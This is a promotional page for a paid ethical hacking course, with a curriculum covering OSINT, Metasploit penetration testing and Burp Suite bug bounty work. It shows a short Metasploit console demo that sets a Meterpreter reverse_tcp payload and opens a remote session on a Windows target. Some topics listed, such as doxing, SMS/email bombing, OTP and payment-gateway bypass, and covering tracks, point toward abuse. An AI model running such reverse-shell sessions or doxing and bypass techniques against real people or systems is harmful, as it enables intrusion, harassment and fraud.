Download Syllabus
CERTIFIED CYBER WARRIOR
ETHICAL HACKING

Master the art of Information Gathering, System Exploitation using Metasploit, and Web Application Security with Burp Suite.

Recon & OSINT

Master Google Hacking (GHDB), NMAP Scanning, and Information Gathering frameworks.

System Exploitation

Use Metasploit to exploit Windows, bypass antivirus, and gain remote access (RDP).

Bug Bounty

Hunt for OWASP Top 10 vulnerabilities using Burp Suite and earn bounties.

The Hacking Roadmap

From Awareness to Advanced Exploitation.

Web Testing & Bug Bounty
Penetration Testing & Metasploit
Information Gathering (Recon)

Course Curriculum

4 WEEKS Information Gathering
1 Intro to Footprinting & Recon
2 Importance of Info Gathering
3 Legal & Ethical Considerations
4 Passive vs Active Recon
5 Types of Info Gathering
6 Passive Techniques
7 Active Techniques
8 OSINT Based Gathering
9 OSINT Frameworks
10 Doxing
11 Google Hacking (GHDB)
12 Nslookup & Whois Lookup
13 Mobile Number Footprinting
14 Website Footprinting
15 SMS, Call & Email Bombing
16 Email Footprinting
17 Image Footprinting
18 NMAP Scanning Info
19 Info Gathering Tools
20 Maltego Recon
21 Gathering Methodology
22 Whois, Nslookup & Dig
23 Social Engineering & OSINT
24 Network Scanning & Enum
25 Identifying & Mapping Targets
26 Shodan & Censys Basics
27 Metadata Extraction
28 Footprinting Automation
29 Miscellaneous Topics
30 Doubt Session
4 WEEKS Penetration Testing & Metaspliot Framework
1 Introduction to Penetration Testing
2 Importance of Penetration Testing in Cybersecurity
3 Legal & Ethical Aspects of Pentesting
4 Types of Penetration Testing
5 Pentesting Methodologies
6 Vulnerability Assessment
7 VAPT
8 VAPT Methodology
9 Phases of Penetration Testing
10 Scoping & Defining Targets in Pentesting
11 Setting Up a Penetration Testing Lab (Local + Cloud)
12 Introduction to Metasploit Framework
13 Exploiting Vulnerabilities with Metasploit
14 Post-Exploitation Techniques
15 Writing Custom Exploits
16 Reporting and Documenting Penetration Tests
17 Windows Hacking using Payloads & Exploits
18 Enumeration
19 SMTP Enumeration
20 FTP Enumeration
21 Remote Desktop Protocols (RDP) & Telnet Service
22 Working on Different Auxiliaries & Exploits
23 Advanced Exploiting Techniques
24 Hacking on WAN (Port Forwarding)
25 Maintaining Access & Covering Tracks
26 Penetration Testing Projects
27 Doubt Session
4 WEEKS Web Testing & Bug Bounty
1 Introduction to Web Application Security
2 How the Web Works
3 URLs, Query Parameters & HTTP Methods
4 Cookies, Sessions, and Authentication Mechanisms
5 Common Web Technologies
6 Same-Origin Policy (SOP) & CORS Basics
7 Introduction to Website Hacking
8 WordPress Websites Hacking
9 Setting Up Burp Suite
10 Introduction to Burp Suite (Community Version)
11 Burp Suite - 1 (Proxy, Repeater, Intruder Basics)
12 Burp Suite - 2 (Decoder, Comparer, Sequencer)
13 OTP Bypass using Burp Suite
14 Payment Gateways Bypass using Burp Suite
15 Common Web Vulnerabilities (OWASP Top 10)
16 Performing Web Application Scans
17 Exploiting Web Vulnerabilities
18 Burp Suite - 3 (Burp Suite Pro Advanced Features)
19 Important Extensions in Burp Suite
20 Introduction to Bug Bounty Programs
21 Bug Bounty using Burp Suite
22 Reporting Vulnerabilities
23 Legal & Ethical Aspects of Bug Hunting
24 Website Hacking Project - 1
25 Website Hacking Project - 2
26 Miscellaneous Topics
27 Doubt Session

Practical Labs

Real world exploitation scenarios.

root@kali:~# msfconsole
_________________________________________________________
| |
| METASPLOIT FRAMEWORK |
|_________________________________________________________|

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > run

[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.10:5566)
meterpreter > sysinfo
Computer: TARGET-PC | OS: Windows 10

Choose Your Path

Master Hacking with CIA's Industry Standard Training

Online Live Batch

Virtual Labs & Cloud Access

₹18,000

+ 18% GST

  • Virtual Labs: 24/7 Access
  • Recordings: Backup Available
  • Certification: CIA Certified
Register Now